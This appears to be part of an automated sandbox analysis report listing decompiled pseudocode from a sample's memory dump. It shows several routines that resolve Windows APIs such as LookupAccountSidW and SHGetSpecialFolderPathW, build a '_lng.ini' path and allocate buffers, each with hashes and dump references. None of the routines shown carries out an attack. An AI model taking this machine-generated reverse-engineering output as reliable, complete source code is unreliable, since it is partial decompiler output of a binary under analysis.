                                                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                  				void* __esi;
                                                                                                  				_Unknown_base(*)()* _t10;
                                                                                                  				void* _t12;
                                                                                                  				struct HINSTANCE__** _t13;
                                                                                                  
                                                                                                  				_t13 = __eax;
                                                                                                  				_t12 = 0;
                                                                                                  				if(E00408F72(__eax) != 0) {
                                                                                                  					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                  					if(_t10 != 0) {
                                                                                                  						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t12;
                                                                                                  			}







                                                                                                  0x00409072
                                                                                                  0x00409074
                                                                                                  0x0040907d
                                                                                                  0x00409086
                                                                                                  0x0040908e
                                                                                                  0x004090a5
                                                                                                  0x004090a5
                                                                                                  0x0040908e
                                                                                                  0x004090ac

                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID: LookupAccountSidW$Y@
                                                                                                  • API String ID: 190572456-2352570548
                                                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E0040AD85(intOrPtr _a4) {
                                                                                                  				_Unknown_base(*)()* _t3;
                                                                                                  				void* _t7;
                                                                                                  				struct HINSTANCE__* _t8;
                                                                                                  				char** _t9;
                                                                                                  
                                                                                                  				_t7 = 0;
                                                                                                  				_t8 = E00405436(L"shlwapi.dll");
                                                                                                  				 *_t9 = "SHAutoComplete";
                                                                                                  				_t3 = GetProcAddress(_t8, ??);
                                                                                                  				if(_t3 != 0) {
                                                                                                  					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                  				}
                                                                                                  				FreeLibrary(_t8);
                                                                                                  				return _t7;
                                                                                                  			}







                                                                                                  0x0040ad8c
                                                                                                  0x0040ad93
                                                                                                  0x0040ad95
                                                                                                  0x0040ad9d
                                                                                                  0x0040ada5
                                                                                                  0x0040adb2
                                                                                                  0x0040adb2
                                                                                                  0x0040adb5
                                                                                                  0x0040adbf

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                  • String ID: shlwapi.dll
                                                                                                  • API String ID: 4092907564-3792422438
                                                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00406597(wchar_t* __esi) {
                                                                                                  				wchar_t* _t2;
                                                                                                  				wchar_t* _t6;
                                                                                                  
                                                                                                  				_t6 = __esi;
                                                                                                  				E00404AD9(__esi);
                                                                                                  				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                  				if(_t2 != 0) {
                                                                                                  					 *_t2 =  *_t2 & 0x00000000;
                                                                                                  				}
                                                                                                  				return wcscat(_t6, L"_lng.ini");
                                                                                                  			}





                                                                                                  0x00406597
                                                                                                  0x00406598
                                                                                                  0x004065a0
                                                                                                  0x004065aa
                                                                                                  0x004065ac
                                                                                                  0x004065ac
                                                                                                  0x004065bd

                                                                                                  APIs
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                  • String ID: _lng.ini
                                                                                                  • API String ID: 383090722-1948609170
                                                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040AC52() {
                                                                                                  				struct HINSTANCE__* _t1;
                                                                                                  				_Unknown_base(*)()* _t2;
                                                                                                  
                                                                                                  				if( *0x4101c4 == 0) {
                                                                                                  					_t1 = E00405436(L"shell32.dll");
                                                                                                  					 *0x4101c4 = _t1;
                                                                                                  					if(_t1 != 0) {
                                                                                                  						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                  						 *0x4101c0 = _t2;
                                                                                                  						return _t2;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t1;
                                                                                                  			}





                                                                                                  0x0040ac59
                                                                                                  0x0040ac60
                                                                                                  0x0040ac68
                                                                                                  0x0040ac6d
                                                                                                  0x0040ac75
                                                                                                  0x0040ac7b
                                                                                                  0x00000000
                                                                                                  0x0040ac7b
                                                                                                  0x0040ac6d
                                                                                                  0x0040ac80

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                  • API String ID: 946536540-880857682
                                                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00406670(char** __esi, void* __eflags) {
                                                                                                  				char* _t30;
                                                                                                  				char** _t39;
                                                                                                  
                                                                                                  				_t39 = __esi;
                                                                                                  				 *__esi = "cf@";
                                                                                                  				__esi[0xb8] = 0;
                                                                                                  				_t30 = E00404FA4(0x338, __esi);
                                                                                                  				_push(0x14);
                                                                                                  				__esi[0xcb] = 0;
                                                                                                  				__esi[0xa6] = 0;
                                                                                                  				__esi[0xb9] = 0;
                                                                                                  				__esi[0xba] = 0xfff;
                                                                                                  				__esi[8] = 0;
                                                                                                  				__esi[1] = 0;
                                                                                                  				__esi[0xb7] = 1;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[2] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[3] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_push(0x14);
                                                                                                  				_t39[4] = _t30;
                                                                                                  				L0040B26C();
                                                                                                  				if(_t30 == 0) {
                                                                                                  					_t30 = 0;
                                                                                                  				} else {
                                                                                                  					_t30[4] = 0;
                                                                                                  					_t30[0x10] = 0;
                                                                                                  					_t30[8] = 0;
                                                                                                  					_t30[0xc] = 0x100;
                                                                                                  					 *_t30 = 0;
                                                                                                  				}
                                                                                                  				_t39[5] = _t30;
                                                                                                  				return _t39;
                                                                                                  			}





                                                                                                  0x00406670
                                                                                                  0x0040667a
                                                                                                  0x00406680
                                                                                                  0x00406686
                                                                                                  0x0040668b
                                                                                                  0x0040668d
                                                                                                  0x00406693
                                                                                                  0x00406699
                                                                                                  0x0040669f
                                                                                                  0x004066a9
                                                                                                  0x004066ac
                                                                                                  0x004066af
                                                                                                  0x004066b9
                                                                                                  0x004066c7
                                                                                                  0x004066d9
                                                                                                  0x004066c9
                                                                                                  0x004066c9
                                                                                                  0x004066cc
                                                                                                  0x004066cf
                                                                                                  0x004066d2
                                                                                                  0x004066d5
                                                                                                  0x004066d5
                                                                                                  0x004066db
                                                                                                  0x004066dd
                                                                                                  0x004066e0
                                                                                                  0x004066e8
                                                                                                  0x004066fa
                                                                                                  0x004066ea
                                                                                                  0x004066ea
                                                                                                  0x004066ed
                                                                                                  0x004066f0
                                                                                                  0x004066f3
                                                                                                  0x004066f6
                                                                                                  0x004066f6
                                                                                                  0x004066fc
                                                                                                  0x004066fe
                                                                                                  0x00406701
                                                                                                  0x00406709
                                                                                                  0x0040671b
                                                                                                  0x0040670b
                                                                                                  0x0040670b
                                                                                                  0x0040670e
                                                                                                  0x00406711
                                                                                                  0x00406714
                                                                                                  0x00406717
                                                                                                  0x00406717
                                                                                                  0x0040671d
                                                                                                  0x0040671f
                                                                                                  0x00406722
                                                                                                  0x0040672a
                                                                                                  0x0040673c
                                                                                                  0x0040672c
                                                                                                  0x0040672c
                                                                                                  0x0040672f
                                                                                                  0x00406732
                                                                                                  0x00406735
                                                                                                  0x00406738
                                                                                                  0x00406738
                                                                                                  0x0040673f
                                                                                                  0x00406745

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1860491036-0
                                                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                  				int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* __edi;
                                                                                                  				int _t32;
                                                                                                  				intOrPtr _t33;
                                                                                                  				intOrPtr _t36;
                                                                                                  				signed int _t48;
                                                                                                  				signed int _t58;
                                                                                                  				signed int _t59;
                                                                                                  				void** _t62;
                                                                                                  				void** _t63;
                                                                                                  				signed int* _t66;
                                                                                                  
                                                                                                  				_t66 = __eax;
                                                                                                  				_t32 = wcslen(_a4);
                                                                                                  				_t48 =  *(_t66 + 4);
                                                                                                  				_t58 = _t48 + _t32;
                                                                                                  				_v12 = _t58;
                                                                                                  				_t59 = _t58 + 1;
                                                                                                  				_v8 = _t32;
                                                                                                  				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                  				 *(_t66 + 4) = _t59;
                                                                                                  				_t62 = _t66 + 0x10;
                                                                                                  				if(_t59 != 0xffffffff) {
                                                                                                  					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                  				} else {
                                                                                                  					free( *_t62);
                                                                                                  				}
                                                                                                  				_t60 =  *(_t66 + 0x1c);
                                                                                                  				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                  				_t63 = _t66 + 0xc;
                                                                                                  				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                  					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                  				} else {
                                                                                                  					free( *_t63);
                                                                                                  				}
                                                                                                  				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                  				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                  				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                  				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                  				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                  				return _t30;
                                                                                                  			}















                                                                                                  0x004054ea
                                                                                                  0x004054ec
                                                                                                  0x004054f1
                                                                                                  0x004054f4
                                                                                                  0x004054f7
                                                                                                  0x004054fa
                                                                                                  0x004054fe
                                                                                                  0x00405501
                                                                                                  0x00405505
                                                                                                  0x00405508
                                                                                                  0x0040550b
                                                                                                  0x0040551b
                                                                                                  0x0040550d
                                                                                                  0x0040550f
                                                                                                  0x0040550f
                                                                                                  0x00405521
                                                                                                  0x00405527
                                                                                                  0x0040552b
                                                                                                  0x0040552e
                                                                                                  0x0040553f
                                                                                                  0x00405530
                                                                                                  0x00405532
                                                                                                  0x00405532
                                                                                                  0x00405556
                                                                                                  0x00405561
                                                                                                  0x0040556e
                                                                                                  0x00405571
                                                                                                  0x00405578
                                                                                                  0x0040557e

                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                  • memcpy.MSVCRT ref: 00405556
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 81%
                                                                                                  			E00405ADF() {
                                                                                                  				void* _t25;
                                                                                                  				signed int _t27;
                                                                                                  				signed int _t29;
                                                                                                  				signed int _t31;
                                                                                                  				signed int _t33;
                                                                                                  				signed int _t50;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t54;
                                                                                                  				signed int _t56;
                                                                                                  				intOrPtr _t60;
                                                                                                  
                                                                                                  				_t60 =  *0x41c470;
                                                                                                  				if(_t60 == 0) {
                                                                                                  					_t50 = 2;
                                                                                                  					 *0x41c470 = 0x8000;
                                                                                                  					_t27 = 0x8000 * _t50;
                                                                                                  					 *0x41c474 = 0x100;
                                                                                                  					 *0x41c478 = 0x1000;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c458 = _t27;
                                                                                                  					_t52 = 4;
                                                                                                  					_t29 =  *0x41c474 * _t52;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c460 = _t29;
                                                                                                  					_t54 = 4;
                                                                                                  					_t31 =  *0x41c474 * _t54;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c464 = _t31;
                                                                                                  					_t56 = 2;
                                                                                                  					_t33 =  *0x41c478 * _t56;
                                                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                  					L0040B26C();
                                                                                                  					 *0x41c45c = _t33;
                                                                                                  					return _t33;
                                                                                                  				}
                                                                                                  				return _t25;
                                                                                                  			}













                                                                                                  0x00405adf
                                                                                                  0x00405ae6
                                                                                                  0x00405af5
                                                                                                  0x00405af6
                                                                                                  0x00405afb
                                                                                                  0x00405b00
                                                                                                  0x00405b0a
                                                                                                  0x00405b18
                                                                                                  0x00405b19
                                                                                                  0x00405b1e
                                                                                                  0x00405b2c
                                                                                                  0x00405b2d
                                                                                                  0x00405b36
                                                                                                  0x00405b37
                                                                                                  0x00405b3c
                                                                                                  0x00405b4a
                                                                                                  0x00405b4b
                                                                                                  0x00405b54
                                                                                                  0x00405b55
                                                                                                  0x00405b5a
                                                                                                  0x00405b68
                                                                                                  0x00405b69
                                                                                                  0x00405b72
                                                                                                  0x00405b73
                                                                                                  0x00405b7b
                                                                                                  0x00000000
                                                                                                  0x00405b7b
                                                                                                  0x00405b80

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033339047-0
                                                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%